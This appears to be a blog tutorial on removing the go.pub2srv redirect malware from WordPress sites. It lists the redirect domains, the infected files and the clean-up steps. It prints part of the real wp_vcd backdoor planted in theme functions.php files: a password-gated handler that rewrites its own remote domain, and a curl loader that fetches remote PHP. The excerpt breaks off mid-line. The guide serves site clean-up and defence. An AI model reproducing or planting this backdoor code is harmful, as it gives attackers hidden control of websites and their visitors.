Best Way To Remove Go.pub2srv Malware from your WordPress Site

Is your WordPress website infected with javascript malware? This ad malware randomly redirects the site/browser to an ad link/external website. This malware infection redirects your website visitors to other malicious domains like go.pub2srv[.]com, go.mobisla[.]com, go.oclaserver[.com].

Here I've provided you with a tutorial on what this malware is all about, what causes this and how to fix this. So stay cool, grab a cup of coffee and continue reading...

[caption id="" align="alignleft" width="400"] Best Way To Remove Go.pub2srv Malware[/caption]

What is Go.pub2srv Malware? 

It is a malware that redirects to a spammy website with an advertisement, p*rn, phishing pages. On mobile devices, it gives an uber popup/popup messages

What Causes this Go.pub2srv Malware? 

In most cases, this is caused by hacks, and it is also caused when you download themes/plugins from an unsafe website and install them on your website.

So it is always advisable to scan the themes/plugins you download from a third-party website (outside wordpress.org directory) on Virus total

Consequences of Hack? 

Since the main cause of this malware is an SQL injection (SQLi) vulnerability, an attacker can do the following:

Add, delete, edit or read content in the database 

Read source code from files on the database server 

Write files to the database server 

Steal user records & passwords of your WordPress/Opencart website 

Theft of transaction information in your OpenCart/WooCommerce stores 

Perform SEO spam on your domain resulting in Google Webmasters blacklist 

Credits: getastra.com
 

How To Remove this Go.pub2srv Malware Code on WordPress? 

Before knowing how to remove this code, you should know where these codes are been found in your WordPress files. These codes are found in the following files:
index.php 

functions.php

Database tables 

The first step to go in removing this go.pub2srv malware from your site is:
 

Take a backup of your WordPress files (or zip the entire folder) so you can restore them if anything goes wrong. 

Change your Password so the hacker won't get access anymore after carrying out the below steps; 

Go to your themes directory and delete all unused themes.  

Remove all plugins downloaded from unknown sources. 

In your active theme, open/edit the function.php file and remove the lines of unfamiliar codes from the beginning. Below is a sample of the code. 

Code:

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f6efce15ddb7aa5764e90dffbfd5cfdc')) {
$div_code_name = "wp_vcd";
switch ($_REQUEST['action']) {
case 'change_domain';
if (isset($_REQUEST['newdomain'])) {
if (!empty($_REQUEST['newdomain'])) {
if ($file = @file_get_contents(__FILE__)) {
if (preg_match_all('/$tmpcontent = @file_get_contents("http://(.*)/code5.php/i', $file, $matcholddomain)) {
$file = preg_replace('/' . $matcholddomain[1][0] . '/i', $_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default:
print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if (!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, " 

After modifying, Click Save

In the wp-includes directory, delete wp-vcd.php, class.wp.php and wp-tmp.php files. 

In the wp-includes directory, open post.php and delete the first php tag added by malware. 

FAQ 

If I delete class.wp.php, WordPress crashes. 

What exactly is deleted in post.php, because I couldn’t find any difference compared to an original post.php file? 

The answer to the above question is to download the latest WordPress installation after that, delete wp-include and wp-admin folder and all files in public_html except wp-content folder, .htaccess file, and wp-config.php file.

After that replace deleted files and folder with the fresh downloaded WordPress.
 

Useful Links & Credits 

Services: 

https://quttera.com 

https://sitecheck.sucuri.net/ 

https://wordpress.org/plugins/sucuri-scanner/ 

http://sucuri.net/malware/entry/MW:BLK:2 

http://labs.sucuri.net/db/malware/rogueads.unwanted_ads?1  

Resource: 

https://www.getastra.com/blog/911/how-to-remove-pub2srv-malware-from-your-wordpress-opencart-website/ 

https://toster.ru/q/482218 

https://pastebin.com/bzcCHnT3 

https://wordpress.org/support/topic/mwjsgen2rogueads-unwanted_ads-1-2/ 

https://www.upwork.com/job/prevent-SQL-injection-PHP-hardening-wordpress-stop-website-hacks_~013dcf70c6f4637ad3/ 

https://fixmywp.com/blog/detect-clean-wordpress-malware-redirect.php 

https://stackoverflow.com/questions/46219263/php-code-in-functions-php-of-all-wordpress-websites-on-my-shared-hosting 

Thanks, and Stay Safe!